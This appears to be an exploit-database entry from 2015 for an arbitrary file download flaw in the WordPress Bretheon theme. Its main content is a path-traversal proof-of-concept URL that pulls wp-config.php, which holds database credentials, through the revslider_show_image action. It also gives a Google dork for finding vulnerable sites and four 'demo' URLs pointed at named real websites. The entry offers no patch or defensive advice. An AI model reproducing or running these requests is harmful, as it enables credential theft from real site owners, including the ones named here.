Wordpress Theme Bretheon Arbitrary File Download Vulnerability

2015-01-18T00:00:00
ID 1337DAY-ID-23140
Type zdt
Reporter MindCracker
Modified 2015-01-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability

# Date: 17/01/2014

# Exploit Author: MindCracker - Team MaDLeeTs

# Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 

# Tested on: Linux / Window

# Google Dork: inurl:wp-content/themes/bretheon/

######################
 
# PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

# PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2018-02-18]  #